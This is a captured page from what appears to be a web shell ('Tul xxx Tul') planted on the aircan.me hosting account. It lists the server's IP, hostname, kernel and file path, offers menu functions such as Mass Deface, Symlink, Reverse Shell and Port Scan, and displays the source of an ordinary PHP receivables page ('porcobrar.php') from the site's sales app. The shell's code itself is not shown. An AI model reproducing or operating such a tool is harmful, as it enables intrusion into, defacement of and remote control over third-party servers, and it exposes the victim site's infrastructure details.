Tul xxx Tul
User / IP
:
216.73.216.217
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
vendefacil
/
views
/
creditos
/
Viewing: porcobrar.php
<?php include_once 'views/templates/header.php'; ?> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center flex-wrap gap-3 mb-3"> <div> <h4 class="mb-1 fw-bold text-primary">Cuentas por Cobrar</h4> <span class="text-muted">Gestiona créditos y registra abonos rápidamente.</span> </div> <button class="btn btn-primary px-3 py-2 shadow-sm d-flex align-items-center gap-2" type="button" id="nuevoAbono" style="border-radius: 12px; font-weight: 600;"> <i class="fas fa-dollar-sign"></i> <span>Agregar Abono</span> </button> </div> <nav> <div class="nav nav-tabs" id="nav-tab" role="tablist"> <button class="nav-link active" id="nav-creditos-tab" data-bs-toggle="tab" data-bs-target="#nav-creditos" type="button" role="tab" aria-controls="nav-creditos" aria-selected="true">Creditos</button> <button class="nav-link" id="nav-abonos-tab" data-bs-toggle="tab" data-bs-target="#nav-abonos" type="button" role="tab" aria-controls="nav-abonos" aria-selected="false">Abonos</button> </div> </nav> <div class="tab-content" id="nav-tabContent"> <div class="tab-pane fade show active mt-2" id="nav-creditos" role="tabpanel" aria-labelledby="nav-creditos-tab" tabindex="0"> <h5 class="card-title text-center"><i class="fas fa-credit-card"></i> Listado de Creditos</h5> <hr> <div class="d-flex justify-content-center mb-3"> <div class="form-group"> <label for="desde">Desde</label> <input id="desde" class="form-control" type="date" value="<?php echo date('Y-m-01'); ?>"> </div> <div class="form-group"> <label for="hasta">Hasta</label> <input id="hasta" class="form-control" type="date" value="<?php echo date('Y-m-d'); ?>"> </div> </div> <div class="table-responsive"> <table class="table table-bordered table-striped table-hover align-middle nowrap" id="tblCreditos" style="width: 100%;"> <thead> <tr> <th>Fecha</th> <th>Monto</th> <th>Cliente</th> <th>Restante</th> <th>Abonado</th> <th>N° Venta</th> <th>Estado</th> <th></th> </tr> </thead> <tbody> </tbody> </table> </div> </div> <div class="tab-pane fade p-3" id="nav-abonos" role="tabpanel" aria-labelledby="nav-abonos-tab" tabindex="0"> <div class="table-responsive"> <table class="table table-bordered table-striped table-hover align-middle nowrap" id="tblAbonos" style="width: 100%;"> <thead> <tr> <th>Fecha</th> <th>Monto</th> <th>N° Credito</th> </tr> </thead> <tbody> </tbody> </table> </div> </div> </div> </div> </div> <?php include_once 'views/templates/footer.php'; ?>
Coded With 💗 by
0x6ick